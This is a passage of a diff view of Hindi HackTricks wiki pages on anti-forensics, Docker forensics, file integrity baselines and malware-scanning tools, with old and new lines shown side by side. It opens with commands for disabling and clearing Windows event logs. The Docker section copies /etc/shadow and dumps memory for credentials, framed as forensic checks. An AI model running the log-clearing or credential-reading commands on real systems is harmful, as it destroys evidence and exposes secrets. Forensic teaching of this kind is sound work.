* सेवाओं खंड के अंदर सेवा "Windows Event Log" को अक्षम करें * सेवाओं के भीतर सेवा "विंडोज घटना लॉग" को अक्षम करें
* `WEvtUtil.exec clear-log` या `WEvtUtil.exe cl` * `WEvtUtil.exec clear-log` या `WEvtUtil.exe cl`
## $UsnJrnl को अक्षम करें ## $UsnJrnl को अक्षम करें

View file

@ -1,22 +1,23 @@
# डॉकर फोरेंसिक्स # डॉकर फोरेंसिक्स
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
## कंटेनर संशोधन ## कंटेनर संशोधन
कुछ संदेह है कि किसी डॉकर कंटेनर को कंप्रोमाइज किया गया था: कुछ संदेह है कि किसी डॉकर कंटेनर में हमला हुआ था:
```bash ```bash
docker ps docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
@ -36,12 +37,12 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
A /var/lib/mysql/mysql/general_log.CSV A /var/lib/mysql/mysql/general_log.CSV
... ...
``` ```
पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया** है\ पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया**
अगर आपको लगता है कि कुछ दिलचस्प फ़ाइल जैसे कि `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच के लिए कर सकते हैं: अगर आपको लगता है कि कोई दिलचस्प फ़ाइल जैसे `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच सकते हैं कि क्या कोई हानिकारक गतिविधि है।
```bash ```bash
docker cp wordpress:/etc/shadow. docker cp wordpress:/etc/shadow.
``` ```
आप एक नए कंटेनर चलाकर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**: आप एक नए कंटेनर को चला कर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**:
```bash ```bash
docker run -d lamp-wordpress docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
@ -53,14 +54,14 @@ docker exec -it wordpress bash
``` ```
## छवि संशोधन ## छवि संशोधन
जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में) तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर हैं **संशोधनों का सारांश निकालने** के लिए: जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में), तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग करके **संशोधनों का सारांश निकाल सकते हैं**:
```bash ```bash
docker save <image> > image.tar #Export the image to a .tar file docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar container-diff analyze -t metadata image.tar
``` ```
फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयित फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं: फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संदेहपूर्ण फ़ाइलें खोज सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं:
```bash ```bash
tar -xf image.tar tar -xf image.tar
``` ```
@ -70,7 +71,7 @@ tar -xf image.tar
```bash ```bash
docker inspect <image> docker inspect <image>
``` ```
आप यहाँ एक सारांश **परिवर्तन के इतिहास** प्राप्त कर सकते हैं: आप निम्नलिखित के साथ एक सारांश **परिवर्तन का इतिहास** प्राप्त कर सकते हैं:
```bash ```bash
docker history --no-trunc <image> docker history --no-trunc <image>
``` ```
@ -90,16 +91,16 @@ Loaded image: flask:latest
#And then open it with dive: #And then open it with dive:
sudo dive flask:latest sudo dive flask:latest
``` ```
यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** रंग जोड़ी गई को और **पीला** रंग संशोधित को दर्शाता है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस**ो फोल्डर को संक्षिप्त/खोलने के लिए करें। यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** अर्थात जोड़ी गई है और **पीला** अर्थात संशोधित है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस**ा उपयोग फ़ोल्डर को संक्षेपित/खोलने के लिए करें।
इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\ इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\
आप इमेज से सभी लेयर्स को डीकंप्रेस कर सकते हैं जिसे इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके: आप इमेज से सभी लेयर को डीकंप्रेस कर सकते हैं ज इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके:
```bash ```bash
tar -xf image.tar tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
``` ```
## मेमोरी से क्रेडेंशियल्स ## मेमोरी से क्रेडेंशियल्स
ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रोसेस देख सकते हैं** बस `ps -ef` चलाकर ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रक्रियाएँ देख सकते हैं** बस `ps -ef` चलाकर
इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)। इसलिए (रूट के रूप में) आप **होस्ट से प्रक्रियाओं की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स**े लिए खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)।

View file

@ -1,40 +1,54 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}
# मूल्यांकन # मूलाधार
एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**। एक मूलाधार किसी सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेने से बनता है ताकि **भविष्य की स्थिति की तुलना करने के लिए परिवर्तनों को हाइलाइट किया जा सके**।
उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फाइलें संशोधित की गई थीं।\ उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फाइल का हैश गणना और स्टोर करना कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फाइलें संशोधित की गई थीं।\
इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए। यह भी उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए।
## फाइल अखंडता मॉनिटरिंग ## फाइल अखंडता मॉनिटरिंग
ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं: फाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT परिवेश और डेटा को सुरक्षित रखती है। इसमें दो मुख्य चरण शामिल हैं:
1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें। 1. **मूलाधार तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके मूलाधार स्थापित करें ताकि संशोधनों का पता लगा सकें।
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से। 2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोध किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
## उपकरण ## उपकरण
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
# संदर्भ ## संदर्भ
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary>HackTricks का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# मैलवेयर विश्लेषण # मैलवेयर विश्लेषण
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## फोरेंसिक्स चीटशीट्स ## फोरेंसिक्स चीटशीट्स
@ -28,7 +29,7 @@ HackTricks का समर्थन करने के अन्य तरी
## ऑफलाइन एंटीवायरस और पहचान उपकरण ## ऑफलाइन एंटीवायरस और पहचान उपकरण
### Yara ### यारा
#### स्थापित #### स्थापित
```bash ```bash
@ -37,7 +38,7 @@ sudo apt-get install -y yara
#### नियम तैयार करें #### नियम तैयार करें
इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम क फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे। _**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम क फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे।
```bash ```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules mkdir rules
@ -48,9 +49,9 @@ python malware_yara_rules.py
yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder yara -w malware_rules.yar folder #Scan the whole folder
``` ```
#### YaraGen: मैलवेयर की जाच करें और नियम बनाएं #### YaraGen: मैलवेयर की जाच करें और नियम बनाएं
आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग करके एक बाइनरी से यारा नियम उत्पन्न कर सक हैं। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग कर हैं ताकि आप एक बाइनरी से यारा नियम उत्पन्न कर सकें। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash ```bash
python3 yarGen.py --update python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/ python3.exe yarGen.py --excludegood -m ../../mals/
@ -67,11 +68,11 @@ sudo freshclam #Update rules
clamscan filepath #Scan 1 file clamscan filepath #Scan 1 file
clamscan folderpath #Scan the whole folder clamscan folderpath #Scan the whole folder
``` ```
### [कैपा](https://github.com/mandiant/capa) ### [Capa](https://github.com/mandiant/capa)
**कैपा** executables में पोटेंशियली हानिकारक **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे: **Capa** प्रोग्रामों में पोटेंशियली जानलेवा **क्षमताएँ** पहचानता है: PE, ELF, .NET। इसलिए यह चीजें खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे:
* OutputDebugString त्रुटि की जाच करें * OutputDebugString त्रुटि की जाच करें
* सेवा के रूप में चलाएं * सेवा के रूप में चलाएं
* प्रक्रिया बनाएं * प्रक्रिया बनाएं
@ -79,15 +80,15 @@ clamscan folderpath #Scan the whole folder
### IOCs ### IOCs
IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क** में इस प्रकार के हानिकारक फ़ाइलों की **खोज के लिए** करती है।\ IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्टि की गई **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क्स** में इस प्रकार के जानलेवा फ़ाइलों की **खोज के लिए** करती है।\
इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेजी से कर सकती है। इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेजी से कर सकती है।
IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\ IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\
आप उपकरणों का उपयोग कर सकते हैं जैसे [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **डिवाइस में परिभाषित IOC की खोज करने के लिए**। आप [**Redline**](https://www.fireeye.com/services/freeware/redline.html) जैसे उपकरण का उपयोग कर सकते हैं **एक उपकरण में परिभाषित IOC की खोज के लिए**।
### लोकी ### Loki
[**लोकी**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान इंडिकेटर्स ऑफ कंप्रोमाइज के लिए।\ [**Loki**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान जानलेवा संकेतों के लिए।\
पहचान चार पहचान पद्धतियों पर आधारित है: पहचान चार पहचान पद्धतियों पर आधारित है:
``` ```
1. File Name IOC 1. File Name IOC
@ -104,11 +105,11 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
``` ```
### लिनक्स मैलवेयर डिटेक्ट ### लिनक्स मैलवेयर डिटेक्ट
[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गनू जीवीपीएल लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क किनारे घुसपैठ डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर निकालने के लिए धमाकों से निकाला गया मैलवेयर का डेटा उपयोग करता है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों से डेटा भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है [**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो लिनक्स के लिए GNU GPLv2 लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क एज इन्ट्रूजन डिटेक्शन सिस्टम से धारा डेटा का उपयोग करता है ताकि हमलों में सक्रिय रूप से उपयोग किया जा रहा मैलवेयर निकाल सके और पहचान के लिए सिग्नेचर उत्पन्न कर सके। साथ ही, धारा डेटा भी उपयोगकर्ता सबमिशन से लिया जाता है जिसमें LMD चेकआउट फीचर और मैलवेयर समुदाय संसाधन शामिल हैं
### आरकेहंटर ### rkhunter
[**रेखंटर**](http://rkhunter.sourceforge.net) जैसे उपकरण फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जहाँ संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है। [**rkhunter**](http://rkhunter.sourceforge.net) जैसे उपकरण को फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जिसमें संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है।
```bash ```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
``` ```
@ -118,27 +119,27 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
### PEpper ### PEpper
[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (बाइनरी डेटा, एंट्रोपी, URLs और IPs, कुछ yara नियम।) [PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक चीजें जैसे binary data, entropy, URLs और IPs, कुछ yara rules की जांच करता है।
### PEstudio ### PEstudio
[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और पोटेंशियल Att\&ck तकनीकों को भी खोजेगा। [PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और potential Att\&ck techniques खोजेगा।
### Detect It Easy(DiE) ### Detect It Easy(DiE)
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **एन्क्रिप्टेड** है या नहीं यह खोजने के लिए है और **पैकर्स** को भी खोजेगा। [**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **encrypted** है या नहीं यह खोजने के लिए है और **packers** भी खोजेगा।
### NeoPI ### NeoPI
